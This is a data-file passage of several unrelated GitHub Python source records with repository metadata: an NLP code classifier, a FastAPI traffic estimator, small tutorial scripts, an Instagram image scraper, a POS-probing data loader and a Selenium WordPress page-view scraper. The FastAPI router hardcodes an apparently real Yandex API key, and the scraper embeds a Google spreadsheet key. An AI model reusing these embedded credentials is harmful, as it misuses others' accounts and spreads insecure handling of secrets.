text_line.rstrip(',').endswith(')') \\\n or text_line.startswith('[') and text_line.rstrip(',').endswith(']'):\n # 出现这种特征,是代码的可能性大,需要经过一遍编译\n # 通过编译则为代码,不通过则录入reduced_set\n parse(text_line) # 尝试编译\n # compile(text_line, '', 'exec')\n code_line_index.add(index)\n elif text_line.startswith(\"if __name__ ==\"):\n # 出现这种特征,肯定是代码\n code_line_index.add(index)\n waiting_line_index.append(index)\n except:\n waiting_line_index.append(index) # 不通过说明from语句没通过编译\n # 然后切分成token再输入token模型\n sharp_inputs = self.from_text_to_token_input([lines[x] for x in waiting_line_index])\n predict_labels = (self.lstm_model_token.predict(sharp_inputs) > 0.5).astype(\"int32\")\n mask = [squeeze(predict_labels) == 0][0] # code\n for index, label in enumerate(mask):\n if label: # code\n code_line_index.add(waiting_line_index[index])\n # 最后使用character模型逐字符判断\n sharp_inputs = self.from_text_to_character_input([lines[x] for x in waiting_line_index])\n predict_label = (self.lstm_model_character.predict(sharp_inputs) > 0.5).astype(\"int32\")\n mask = [squeeze(predict_label) == 0][0] # code\n for index, label in enumerate(mask):\n if label: # code\n code_line_index.add(waiting_line_index[index])\n result = [False] * len(lines)\n for index in code_line_index:\n result[index] = True\n return result\n\n def dump_res(self, tuple_list):\n \"\"\"添加一些其他信息,然后整合成code_warning.json\"\"\"\n for dic in tuple_list:\n dic['offset'] = 0\n dic['length'] = 0\n dic['module'] = ''\n dic['problem_class'] = {\n 'name': '8_2',\n 'severity': '',\n 'inspection_name': '8_2',\n 'attribute_key': ''\n }\n dic['entry_point'] = {\n 'TYPE': '',\n 'FQNAME': ''\n }\n dic['description'] = 'Do not use comment lines to make the code invalid.'\n with open(os.path.join(self.outfile, 'code_warning.json'), 'w') as f:\n dump({'problems': tuple_list}, f)\n\n\ndef main():\n parser = ArgumentParser(description='Check if pyfile contains commented-out code.')\n\n parser.add_argument(dest='root_path', metavar='root_path',\n help='Check project root path')\n\n parser.add_argument('-mc', '--model_character_path',\n metavar='model_character_path',\n default='models/mc.hdf5',\n dest='model_character_path',\n help='character based model path')\n\n parser.add_argument('-mt', '--model_token_path',\n metavar='model_token_path',\n default='models/mt_20000.hdf5',\n dest='model_token_path',\n help='token based model path')\n\n parser.add_argument('-v', '--vocab',\n metavar='vocab_path',\n default='vocabs/vocab_20000.txt',\n dest='vocab_path',\n help='token vocabulary path')\n\n parser.add_argument('-o', dest='outfile',\n default='results',\n help='output file path')\n\n args = parser.parse_args()\n\n args = {'root_path': args.root_path,\n 'model_character_path': args.model_character_path,\n 'model_token_path': args.model_token_path,\n 'vocab_path': args.vocab_path,\n 'outfile': args.outfile,\n }\n\n classifier = Classifier(**args)\n classifier.classify()\n\nif __name__ == '__main__':\n main()\n","repo_name":"superlova/codeclf","sub_path":"codeclf.py","file_name":"codeclf.py","file_ext":"py","file_size_in_byte":20262,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"71103918889","text":"from fastapi import APIRouter, Request\r\nfrom fastapi.responses import JSONResponse\r\nfrom algorithm import *\r\nfrom math import radians, cos, sin, asin, sqrt\r\n\r\n\r\ndef get_distance(lat1, lat2, lon1, lon2):\r\n lon1 = radians(lon1)\r\n lon2 = radians(lon2)\r\n lat1 = radians(lat1)\r\n lat2 = radians(lat2)\r\n dlon = lon2 - lon1\r\n dlat = lat2 - lat1\r\n a = sin(dlat / 2)**2 + cos(lat1) * cos(lat2) * sin(dlon / 2)**2\r\n c = 2 * asin(sqrt(a))\r\n r = 6371\r\n return(c * r) * 1000\r\n\r\nrouter = APIRouter(\r\n prefix='/api'\r\n)\r\napikey = '67b62d8b-ea26-4350-a5f6-6e7a3c6ed99e'\r\nurl = 'https://geocode-maps.yandex.ru/1.x'\r\nparams = {\r\n 'apikey': apikey,\r\n 'geocode': None,\r\n 'sco': 'latlong',\r\n 'kind': 'metro',\r\n 'format': 'json'\r\n}\r\nbellar_district = District(0.7*202000, 0.7*212000)\r\n# 0.85 - 500 - 1000\r\nroads = {'Center': ([55.775503, 37.571737], [55.773229, 37.554314], [55.772581, 37.572870], [55.775097, 37.582827]),\r\n 'Out': ([55.774584, 37.560923], [55.770859, 37.567703], [55.773887, 37.579179])}\r\ntypes = {'ЖК': Houses, 'Жилое': House, 'Отель': Hotel, 'Офис': Office}\r\nmetro_cords = {'Белорусская': (55.777349, 37.581997), 'Беговая': (55.773106, 37.549837)}\r\n\r\n\r\n@router.get('/traffic')\r\nasync def get_info(cords: str, type: str, area: float, floors: int, schools: int, n: int, metro: str, time: str):\r\n cords = tuple(float(i) for i in cords.split(','))\r\n dst = get_distance(metro_cords[metro][0], cords[0], metro_cords[metro][1], cords[1])\r\n building = types[type](area, floors, dst, schools, n)\r\n roads = []\r\n metro_params = {'Default': {'Белорусская': 18000, 'Беговая': 13500}, 'Rush': {'Белорусская': 9.6, 'Беговая': 3.4}}\r\n metro = Metro(metro_params['Default'][metro], building.getter(), bellar_district.getter(), metro_params['Rush'][metro], 1, time) \r\n return metro.getter()\r\n\r\n","repo_name":"code-n-cry/DriveHack_MosTransProject","sub_path":"backend/api_router.py","file_name":"api_router.py","file_ext":"py","file_size_in_byte":1923,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"}
+{"seq_id":"27600773174","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# @Author : mofei\n# @Time : 2019/8/19 19:52\n# @File : p15_iterate_in_sorted_order_over_merged_sorted_iterables.py\n# @Software: PyCharm\n\n\"\"\"顺序迭代合并后的排序迭代对象\"\"\"\n\nimport heapq\n\na = [1, 4, 7, 10]\nb = [2, 5, 6, 11]\n\nfor i in heapq.merge(a, b):\n print(i, end=',')\n\n# heapq.merge 可迭代特性意味着它不会立马读取所有序列。这就意味着可以在非常长的序列中使用,而不会有太大的开销\n\n# heapq.merge() 需要所有输入序列必须是排过序的。\n# 它并不会预先读取所有数据到堆栈中或者预先排序,也不会对输入做任何的排序检测。\n# 它仅仅是检查所有序列的开始部分并返回最小的那个,这个过程一直会持续直到所有输入序列中的元素都被遍历完。\n","repo_name":"mofei952/cookbook","sub_path":"c04_iterators_and_generators/p15_iterate_in_sorted_order_over_merged_sorted_iterables.py","file_name":"p15_iterate_in_sorted_order_over_merged_sorted_iterables.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"37570036917","text":"import requests \r\nfrom bs4 import BeautifulSoup as bs \r\nimport json \r\nimport random \r\nimport os.path \r\nimport urllib.request\r\ninsta_url ='https://www.instagram.com'\r\ninta_username = input()\r\n\r\nresponse = requests.get(f\"{insta_url}/{inta_username}/\") \r\n\r\nif response.ok: \r\n\thtml = response.text \r\n\tbs_html = bs(html, features =\"lxml\") \r\n\tbs_html = bs_html.text \r\n\tindex = bs_html.find('profile_pic_url_hd')+21\r\n\tremaining_text = bs_html[index:] \r\n\tremaining_text_index = remaining_text.find('requested_by_viewer')-3\r\n\tstring_url = remaining_text[:remaining_text_index] \r\n\tX=string_url.split('\\\\u0026')\r\n\tstring_url=\"&\".join(X)\r\n\r\n\r\n\r\nurllib.request.urlretrieve(string_url, \"pic1.jpg\")\r\nprint(\"\\n\t\t\t downloading completed ..............\") \r\n","repo_name":"Scoder08/scoder","sub_path":"insta.py","file_name":"insta.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"22860508975","text":"def fib(n: int) -> int:\n \"\"\"\n Calculates the n-th Fibonacci number in O(log(n)) time.\n See: [Exercise 1.19](https://bit.ly/3Bhv2JR)\n \"\"\"\n if n < 0:\n fib_neg = fib(-n)\n return fib_neg if (1 - n) % 2 == 0 else -fib_neg\n\n a, b, p, q = 1, 0, 0, 1\n\n while n:\n if n % 2 == 0:\n p, q = (p**2 + q**2), (q**2 + 2 * p * q)\n n //= 2\n else:\n a, b = (b * q + a * p + a * q), (b * p + a * q)\n n -= 1\n\n return b\n","repo_name":"matyama/codewars","sub_path":"python/codewars/fibonacci.py","file_name":"fibonacci.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"34871259488","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\ndef title(y_pred, y_test, target_names, idx):\n if y_pred.max() == 1 and y_test.max() == 1 and target_names.max() == 1:\n pred_name = \"Less or equal than 4\" if int(y_pred[idx]) == 0 else \"Greater or equal than 5\"\n exp_name = \"Less or equal than 4\" if y_test[idx] == 0 else \"Greater or equal than 5\"\n else:\n pred_name = target_names[int(y_pred[idx])]\n exp_name = target_names[y_test[idx]]\n \n return f\"predicted: {pred_name}\\nexpected: {exp_name}\"\n\n\ndef plot_gallery(images, titles, h, w, rows = 3, cols = 4):\n plt.figure(figsize=(1.8 * cols, 2.4 * rows))\n plt.subplots_adjust(bottom=0, left=.01, right=.99, top=.90, hspace=.35)\n\n for i in range(rows * cols):\n plt.subplot(rows, cols, i + 1)\n plt.imshow(images[i].reshape((h, w)), cmap=plt.cm.gray)\n plt.title(titles[i], size=12)\n plt.xticks(())\n plt.yticks(())\n\n plt.show()\n\n\ndef convert_target(target):\n new_target = list()\n\n for mark in target:\n if mark < 5:\n new_target.append(0)\n else:\n new_target.append(1)\n\n return np.array(new_target)","repo_name":"ThinkingFrog/OptimizationMethods","sub_path":"Coursework/recognition/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1177,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"74820724649","text":"\nfrom cs50 import get_string\n\n# Prompt user for text\ntext = get_string(\"Text: \")\n\n# words variable should have +1 because the last word is followed by a punctuation, and not by ' '\nwords = 1\nsentences = 0\nletters = 0\n\n# Loop through each character\nfor i in range(len(text)):\n \n # If the char is a letter, update the variable\n if text[i].isalpha():\n letters += 1\n \n # If it's a space, then it means it's the end of a word\n elif text[i] == ' ':\n words += 1\n \n # If it's a punct, update the sentences variable\n elif text[i] == '.' or text[i] == '?' or text[i] == '!':\n sentences += 1\n\n# l letters in w words ==> l -- w\n# L letters in 100 words: L -- 100\n\n# Equation becomes: 100.l = w.L\n# L = 100.l/w\n# Same goes for sentences\n\n# L is letters per 100 words\nL = (letters * 100) / words\n\n# S is sentences per 100 words\nS = (sentences * 100) / words\n\n# Coleman-Liau index\nindex = round(0.0588 * L - 0.296 * S - 15.8)\n\n# Print grade according to the index\nif index >= 16:\n print(\"Grade 16+\")\n \nelif index < 1:\n print(\"Before Grade 1\")\n \nelse:\n print(f\"Grade: {index}\")\n","repo_name":"gustavokenzo1/cs50","sub_path":"Week 6 - Readability.py","file_name":"Week 6 - Readability.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"23725817464","text":"continua = str('sim')\nresposta = str('sim')\n\nwhile not resposta != continua:\n fat = 1\n\n n = int(input('Qual o fatorial?: '))\n\n for fatorial in range(1, n + 1):\n fat = fatorial * fat\n\n print(fat)\n resposta = str(input('Deseja continuar?: ').lower())\n\nprint('Programa encerrado a pedido do usuário.')\n","repo_name":"welderessutti/exercises_and_studies","sub_path":"livro_algoritmos/fatorail_interativo.py","file_name":"fatorail_interativo.py","file_ext":"py","file_size_in_byte":322,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"17590532778","text":"import flair \nimport torch\nimport numpy as np \nimport spacy\nimport transformers\nimport os, sys, time\nfrom tqdm import tqdm\nimport psutil\nimport pickle\nimport gensim\n\nfrom constants import spacy_pos_dict, spacy_model_names, gensim_fasttext_models\n\ndevice = torch.device(\"cuda\") if torch.cuda.is_available() else torch.device(\"cpu\")\n\ndef print_memory_usage(label):\n process = psutil.Process(os.getpid())\n #print(process.memory_info())\n mem = process.memory_info().rss / 1024 / 1024\n print (\"{} using {:.2f} MB memory!\".format(label, mem))\n\nclass DataLoader():\n def __init__(self, split, args):\n self.args = args\n self.pos_tags = spacy_pos_dict[args.lang]\n if args.lm == \"bertmulti\":\n self.emb_dim = 768\n elif args.lm == \"fasttext\":\n self.emb_dim = 100\n else:\n self.emb_dim = -1\n cache_dataset_head = \"cache/{}_{}_{}_{}\".format(args.lang, args.lm, split, args.task)\n if os.path.exists(cache_dataset_head):\n pass\n #print (\"{} exists. Loading the datasets.\".format(cache_dataset_head))\n else:\n print (\"Generating dataset in {}\".format(cache_dataset_head))\n os.makedirs(cache_dataset_head)\n self._generate_data_pairs(split, cache_dataset_head, args)\n filelist_short = os.listdir(cache_dataset_head)\n self.ckpt_filelist = [os.path.join(cache_dataset_head, fn_short) for fn_short in filelist_short]\n self.ckpt_ptr = 0\n # self.x and self.y are loaded from the checkpoint in ckpt_filelist[self.ckpt_ptr]\n self.x = []\n self.y = [] \n self.ptr = 0 # iterates through self.x and self.y\n self.reset()\n\n if split == \"train\":\n self.batch_size = args.batch_size\n else:\n self.batch_size = 1\n\n def _generate_data_pairs(self, split, cache_dataset_head, args):\n \"\"\"\n Return CPU torch tensors\n \"\"\"\n # Corpus\n if args.lang == \"en\": \n corpus = flair.datasets.UD_ENGLISH()\n elif args.lang == \"fr\":\n corpus = flair.datasets.UD_FRENCH()\n elif args.lang == \"es\":\n corpus = flair.datasets.UD_SPANISH()\n else:\n raise ValueError\n if split == \"train\":\n corpus_split = corpus.train \n elif split == \"dev\":\n corpus_split = corpus.dev \n elif split == \"test\":\n corpus_split = corpus.test \n else:\n raise ValueError(\"split {} not accepted!\".format(split))\n\n # SpaCy tagger\n spacy_nlp = spacy.load(spacy_model_names[args.lang])\n\n # Word Embedding (huggingface)\n if args.lm == \"bertmulti\":\n emb_tag = \"bert-base-multilingual-cased\"\n tokenizer = transformers.BertTokenizer.from_pretrained(emb_tag)\n emb = transformers.BertModel.from_pretrained(emb_tag)\n self.emb_dim = emb.config.hidden_size\n elif args.lm == \"fasttext\":\n tokenizer = BaselineTokenizer()\n emb = gensim.models.FastText(gensim_fasttext_models[args.lang])\n self.emb_dim = 100\n elif args.lm == \"glove\":\n raise NotImplementedError\n else:\n raise ValueError(\"lm {} not supported\".format(args.lm))\n\n start_time = time.time()\n dumpcnt = 1\n all_x = []\n all_y = []\n for doc_id, article in enumerate(corpus_split):\n raw_s = article.to_plain_string()\n sent_x, sent_y = self._process_sentence(raw_s, spacy_nlp, tokenizer, emb, args)\n all_x += sent_x\n all_y += sent_y\n if doc_id>0 and doc_id % 1024 == 0:\n self._process_dump(all_x, all_y, cache_dataset_head, dumpcnt, args.task)\n all_x = []\n all_y = []\n dumpcnt += 1\n print (\"Processed {} docs in {:.2f} seconds. Cacheing...\".format(doc_id, time.time() - start_time))\n print_memory_usage(f\"docid {doc_id}\")\n self._process_dump(all_x, all_y, cache_dataset_head, dumpcnt, args.task)\n print (\"Finished processing and cached {} docs in {:.2f} seconds.\".format(len(corpus_split), time.time() - start_time))\n\n def _process_dump(self, all_x, all_y, cache_dataset_head, dumpcnt, task):\n all_x_tensors = torch.cat(all_x, dim=0).to(device) # (N, D)\n all_y_tensors = torch.cat(all_y).to(device) # (N,)\n\n if args.task == \"probe\":\n pass \n elif args.task == \"ctarget\":\n rand_y_tensors = torch.LongTensor(np.random.randint(0, len(self.pos_tags), all_y_tensors.shape)).to(device)\n all_y_tensors = rand_y_tensors \n elif args.task == \"crep\":\n all_x_tensors = torch.FloatTensor(np.random.normal(0, 1, all_x_tensors.shape)).to(device)\n else:\n raise ValueError(\"Task {} not accepted!\".format(args.task))\n\n cache_name = os.path.join(cache_dataset_head, f\"{dumpcnt}.pt\")\n with open(cache_name, \"wb+\") as f:\n pickle.dump({\n \"x\": all_x_tensors,\n \"y\": all_y_tensors\n }, f)\n\n return all_x_tensors, all_y_tensors\n\n def _process_sentence(self, raw_s, spacy_nlp, tokenizer, emb, args):\n spacy_tokens = spacy_nlp(raw_s)\n spacy_token_texts = [token.text_with_ws for token in spacy_tokens]\n hf_tokens = tokenizer.tokenize(raw_s)\n clean_hf_tokens = []\n for token in hf_tokens:\n if token.startswith(\"##\"):\n clean_hf_tokens.append(token[2:])\n else:\n clean_hf_tokens.append(token)\n cost, s2h, h2s, s2h_multi, h2s_multi = spacy.gold.align(spacy_token_texts, clean_hf_tokens)\n\n BERT_MAX_LEN = 510\n sent_x = []\n sent_y = []\n\n while len(hf_tokens) > BERT_MAX_LEN:\n hf_tokens_head = hf_tokens[:BERT_MAX_LEN]\n hf_tokens_rem = hf_tokens[BERT_MAX_LEN:]\n h2s_head = h2s[:BERT_MAX_LEN]\n h2s_rem = h2s[BERT_MAX_LEN:]\n h2s_rem = (np.array(h2s_rem) - BERT_MAX_LEN).tolist()\n\n spacy_tokens_head = spacy_tokens[:h2s[BERT_MAX_LEN]]\n spacy_tokens_rem = spacy_tokens[h2s[BERT_MAX_LEN]:]\n s2h_head = s2h[:h2s[BERT_MAX_LEN]]\n s2h_rem = s2h[:h2s[BERT_MAX_LEN]]\n s2h_rem = (np.array(s2h_rem) - h2s[BERT_MAX_LEN]).tolist()\n \n chunk_x, chunk_y = self._align_chunk(hf_tokens_head, h2s_head, spacy_tokens_head, s2h_head, tokenizer, emb)\n sent_x += chunk_x \n sent_y += chunk_y \n\n hf_tokens = hf_tokens_rem \n h2s = h2s_rem \n spacy_tokens = spacy_tokens_rem \n s2h = s2h_rem \n chunk_x, chunk_y = self._align_chunk(hf_tokens, h2s, spacy_tokens, s2h, tokenizer, emb)\n sent_x += chunk_x \n sent_y += chunk_y\n return sent_x, sent_y \n\n def _align_chunk(self, hf_tokens_head, h2s_head, spacy_tokens_head, s2h_head, tokenizer, emb):\n chunk_x = []\n chunk_y = []\n # Ok now that *_head does not overflow\n # Process the doc and alignments\n if self.args.lm == \"bertmulti\":\n hf_indices_head = tokenizer.encode(hf_tokens_head) # list of int\n vecs, _ = emb(torch.tensor(hf_indices_head).unsqueeze(0))\n # vecs is [1, seq_len, ndim]\n elif self.args.lm == \"fasttext\":\n vecs = torch.tensor(np.array([emb.wv[w] for w in hf_tokens_head])).unsqueeze(0)\n else:\n raise NotImplementedError\n \n # Just traverse the spacy tokenization\n # When there is a miss, find the corresponding miss at hf tokenization\n # Handle the missing parts. Then repeat at subseq no-miss at spacy sequence\n i, j = 0, -1\n while i < len(s2h_head):\n if s2h_head[i] > 0:\n j = s2h_head[i]\n x = vecs[:, j] # x is tensor of shape (1, d_emb)\n y = self._pos_to_label(spacy_tokens_head[i].pos_)\n chunk_x.append(x)\n chunk_y.append(y)\n i += 1\n else:\n start_i, end_i = i, i+1\n while end_i < len(s2h_head) and s2h_head[end_i] < 0:\n end_i += 1\n if end_i == len(s2h_head):\n break\n i = end_i\n if end_i > start_i + 1: # Multiple spacy misses. Skip them\n j = s2h_head[end_i]\n continue \n else: # Only one spacy miss. Find corresponding hf misses\n # Note1: j corresponds to the *previous* value\n # Note2: end_j will at most be len(h2s_head)\n start_j, end_j = j+1, j+2\n while end_j < len(h2s_head) and h2s_head[end_j] < 0:\n end_j += 1\n x = torch.mean(vecs[:, start_j:end_j], dim=1)\n y = self._pos_to_label(spacy_tokens_head[i].pos_)\n chunk_x.append(x)\n chunk_y.append(y)\n\n return chunk_x, chunk_y \n\n def has_next(self):\n return self.ckpt_ptr < len(self.ckpt_filelist)-1 or self.ptr + self.batch_size <= len(self.x)\n\n def next(self):\n if self.ptr + self.batch_size < len(self.x):\n start = self.ptr \n end = start + self.batch_size \n xbatch, ybatch = self.x[start: end], self.y[start: end]\n self.ptr = end\n elif self.ckpt_ptr < len(self.ckpt_filelist)-1:\n self.ckpt_ptr += 1\n self.x, self.y = self._load_file(self.ckpt_ptr)\n start, end = 0, self.batch_size\n xbatch, ybatch = self.x[start: end], self.y[start: end]\n self.ptr = end \n else:\n return None, None\n return xbatch, ybatch\n\n def _pos_to_label(self, pos_tag):\n if self.args.lang == \"fr\":\n if pos_tag == \"INTJ\":\n pos_tag = \"X\"\n elif pos_tag == \"SYM\":\n pos_tag = \"X\"\n elif self.args.lang == \"es\":\n if pos_tag == \"X\":\n pos_tag = \"INTJ\"\n return torch.LongTensor([self.pos_tags.index(pos_tag)])\n\n def reset(self):\n self.ckpt_ptr = 0\n self.ptr = 0\n self.x, self.y = self._load_file(self.ckpt_ptr)\n\n def _load_file(self, ckpt_ptr):\n with open(self.ckpt_filelist[ckpt_ptr], \"rb\") as f:\n checkpoint = pickle.load(f)\n return checkpoint[\"x\"], checkpoint[\"y\"]\n\n\nclass BaselineTokenizer:\n def __init__(self):\n pass \n\n def tokenize(self, s):\n \"\"\"\n Input: s (a string representation of a sentence)\n Output: tokens (list of string). \n \"\"\"\n return s.split()\n\n\nif __name__ == \"__main__\":\n import argparse\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--lm\", type=str, choices=[\"bertmulti\", \"fasttext\", \"glove\"], default=\"bertmulti\")\n parser.add_argument(\"--lang\", type=str, choices=[\"en\", \"es\", \"fr\"], default=\"en\")\n parser.add_argument(\"--task\", type=str, choices=[\"probe\", \"ctarget\", \"crep\"], default=\"probe\")\n\n parser.add_argument(\"--split\", type=str, choices=[\"train\", \"dev\", \"test\"], default=\"dev\")\n parser.add_argument(\"--batch_size\", type=int, default=1)\n args = parser.parse_args()\n \n dl = DataLoader(args.split, args)\n\n print(\"dl.has_next():\", dl.has_next())\n\n print (\"Checking if device is on GPU\")\n x_tensor, y_tensor = dl.next()\n print(\"x_tensor.shape:\", x_tensor.shape)\n print(\"y_tensor.shape:\", y_tensor.shape)\n print(\"x_tensor.device:\", x_tensor.device)\n print(\"y_tensor.device:\", y_tensor.device)\n\n print (\"Checking NaN for this dataset\")\n dl.reset()\n success = True \n while dl.has_next():\n x_tensor, y_tensor = dl.next()\n if x_tensor is None:\n break \n if torch.isnan(x_tensor).sum() > 0:\n print (\"x_tensor has nan entries! Stopping!\")\n success = False \n break\n if torch.isnan(y_tensor).sum() > 0:\n print (\"y_tensor has nan entries! Stopping!\")\n success = False \n break\n if success:\n print (\"NaN test passed!\")\n else:\n print (\"NaN test failed!\")\n \n print (\"Compute H(T)\")\n import scipy\n from scipy.stats import entropy\n dl.reset()\n labels = []\n while dl.has_next():\n x_tensor, y_tensor = dl.next()\n if x_tensor is None:\n break\n labels += y_tensor.cpu().numpy().tolist()\n ent = entropy(labels, base=2)\n print (\"H(T)={:.4f}\".format(ent))","repo_name":"SPOClab-ca/InfoProbe","sub_path":"src/dataloader.py","file_name":"dataloader.py","file_ext":"py","file_size_in_byte":12629,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"39415495281","text":"import os\n\n# Algoritmo para percorrer os arquivos dentro de um caminho de diretórios e localizar um ou mais arquivos a partir do termo procurado.\n\ncaminho_procura = input('Digite um caminho: ')\ntermo_procura = input('Digite um termo: ')\n\n\ndef formata_tamanho(size):\n base = 1024\n kilo = base\n mega = base**2\n giga = base**3\n tera = base**4\n peta = base**5\n\n if size < kilo:\n # na primeira verificação não é necessário manipular o valor de `size`\n texto = 'B'\n elif size < mega:\n size /= kilo\n texto = 'K'\n elif size < giga:\n size /= mega\n texto = 'M'\n elif size < tera:\n size /= giga\n texto = 'G'\n elif size < peta:\n size /= tera\n texto = 'T'\n else:\n size /= peta\n texto = 'P'\n size = round(size, 2)\n return f'{size}{texto}'.replace('.', ',')\n\n\ncontador_de_arquivos = 0\nfor raiz, diretorios, arquivos in os.walk(caminho_procura):\n for arquivo in arquivos:\n if termo_procura in arquivo:\n try:\n contador_de_arquivos += 1\n caminho_completo = os.path.join(raiz, arquivo)\n nome_arquivo, ext_arquivo = os.path.splitext(arquivo)\n tamanho = os.path.getsize(caminho_completo)\n\n print()\n print(f'Encontrei o arquivo: {arquivo}')\n print(f'Caminho: {caminho_completo}')\n print(f'Nome: {nome_arquivo}')\n print(f'Extensão: {ext_arquivo}')\n print(f'Tamanho: {tamanho}')\n print(f'Tamanho formatado: {formata_tamanho(tamanho)}')\n except PermissionError as e:\n print('Sem permissão.')\n except FileNotFoundError as e:\n print('Arquivo não encontrado.')\n except Exception as e:\n print('Erro desconhecido: ', e)\n\nprint()\nprint(f'{contador_de_arquivos} arquivo(s) encontrado(s).')\n\n\n# Quando houver barras invertidas no caminho informado (no caso do Windows) é necessário urilizar o `r` antes da string com o caminho:\n\n# caminho_windows = r'C:\\programs\\anything'\n","repo_name":"renatodev95/curso-python","sub_path":"secao5-modulos-python/os1.py","file_name":"os1.py","file_ext":"py","file_size_in_byte":2141,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"16091511448","text":"from selenium import webdriver\r\nfrom webdriver_manager.chrome import ChromeDriverManager\r\nfrom time import sleep\r\nimport datetime\r\nimport gspread\r\nimport json\r\nfrom oauth2client.service_account import ServiceAccountCredentials\r\nimport schedule\r\n\r\nmail_username = 'wordpress account mail or username'\r\npassword = 'wordpress account password'\r\nwp_edit = 'https://your URL.dmain/wp-admin/edit.php'\r\n\r\ndate_number = 2\r\ndef check_pv():\r\n scope = ['https://spreadsheets.google.com/feeds','https://www.googleapis.com/auth/drive']\r\n credentials = ServiceAccountCredentials.from_json_keyfile_name('mywp2v-505293b83604.json', scope)\r\n gc = gspread.authorize(credentials)\r\n SPREADSHEET_KEY = '1Rs8Q01HwJdBPLrxme60rBSZm5aUR8pm6CkQNZzZ-r9w'\r\n worksheets = gc.open_by_key(SPREADSHEET_KEY).worksheets()\r\n worksheet = worksheets[0]\r\n worksheet2 = worksheets[1]\r\n\r\n options = webdriver.ChromeOptions()\r\n options.add_argument('--headless')\r\n driver = webdriver.Chrome(ChromeDriverManager().install(),options=options)\r\n driver.get(wp_edit)\r\n global mail_username\r\n driver.find_element_by_id('user_login').send_keys(mail_username)\r\n global password\r\n driver.find_element_by_id('user_pass').send_keys(password)\r\n driver.find_element_by_id('wp-submit').click()\r\n global date_number\r\n all_id = driver.find_element_by_xpath('/html/body/div[1]/div[2]/div[2]/div[1]/div[3]/form[1]/div[1]/div[3]/span[1]').text\r\n all_id = all_id.replace('個の項目','')\r\n title_list = []\r\n id_list = []\r\n pv_list = []\r\n if date_number == 1:\r\n sheet_num = int(all_id) + 1\r\n n = 1\r\n while True:\r\n try:\r\n title_path = f'/html/body/div[1]/div[2]/div[2]/div[1]/div[3]/form[1]/table/tbody/tr[{n}]/td[1]/strong/a'\r\n id_path = f'/html/body/div[1]/div[2]/div[2]/div[1]/div[3]/form[1]/table/tbody/tr[{n}]/td[8]'\r\n pv_path = f'/html/body/div[1]/div[2]/div[2]/div[1]/div[3]/form[1]/table/tbody/tr[{n}]/td[7]'\r\n title = driver.find_element_by_xpath(title_path).text\r\n id = driver.find_element_by_xpath(id_path).text\r\n pv = driver.find_element_by_xpath(pv_path).text\r\n pv = pv.replace(' ビュー','')\r\n print(f'タイトル={title}・ID={id}、PV={pv}')\r\n print(f'n={n}・sheet_num={sheet_num}')\r\n worksheet.update_cell(sheet_num,1,title)\r\n #worksheet2.update_cell(sheet_num,1,title)\r\n worksheet.update_cell(sheet_num,2,id)\r\n #worksheet2.update_cell(sheet_num,2,id)\r\n worksheet.update_cell(sheet_num,3,pv)\r\n if n == 1:\r\n date = datetime.datetime.now().strftime('%m/%d')\r\n worksheet.update_cell(1,3,date)\r\n if n % 50 == 0 :\r\n driver.find_element_by_xpath('/html/body/div[1]/div[2]/div[2]/div[1]/div[3]/form[1]/div[2]/div[3]/span[2]/a[1]').click()\r\n sleep(1)\r\n n = 0\r\n sheet_num -= 1\r\n n += 1\r\n sleep(2)\r\n except:\r\n break\r\n\r\n else:\r\n sheet_num = int(all_id) + 1\r\n print(sheet_num)\r\n n = 1\r\n column_number = date_number + 2\r\n while True:\r\n try:\r\n title_path = f'/html/body/div[1]/div[2]/div[2]/div[1]/div[3]/form[1]/table/tbody/tr[{n}]/td[1]/strong/a'\r\n id_path = f'/html/body/div[1]/div[2]/div[2]/div[1]/div[3]/form[1]/table/tbody/tr[{n}]/td[8]'\r\n pv_path = f'/html/body/div[1]/div[2]/div[2]/div[1]/div[3]/form[1]/table/tbody/tr[{n}]/td[7]'\r\n title = driver.find_element_by_xpath(title_path).text\r\n id = int(driver.find_element_by_xpath(id_path).text)\r\n pv = driver.find_element_by_xpath(pv_path).text\r\n pv = int(pv.replace(' ビュー',''))\r\n title_list.append(title)\r\n id_list.append(id)\r\n pv_list.append(pv)\r\n title_data = worksheet.cell(sheet_num,2).value\r\n if title_data == id:\r\n worksheet.update_cell(sheet_num,column_num,pv)\r\n else:\r\n worksheet.update_cell(sheet_num,1,title)\r\n sleep(0.5)\r\n worksheet2.update_cell(sheet_num,1,title)\r\n worksheet.update_cell(sheet_num,2,id)\r\n sleep(0.5)\r\n worksheet2.update_cell(sheet_num,2,id)\r\n worksheet.update_cell(sheet_num,column_number,pv)\r\n if n == 1:\r\n date = datetime.datetime.now().strftime('%m/%d')\r\n column_num = date_number + 2\r\n worksheet.update_cell(1,column_num,date)\r\n if n % 50 == 0 :\r\n driver.find_element_by_xpath('/html/body/div[1]/div[2]/div[2]/div[1]/div[3]/form[1]/div[2]/div[3]/span[2]/a[1]').click()\r\n sleep(1)\r\n n = 0 \r\n n += 1\r\n sleep(1)\r\n a = date_number + 1\r\n b = date_number + 2\r\n c = date_number + 1\r\n day1_pv = worksheet.cell(sheet_num,a).value\r\n day1 = worksheet.cell(1,a).value\r\n day2_pv = worksheet.cell(sheet_num,b).value\r\n day2 = worksheet.cell(1,b).value\r\n 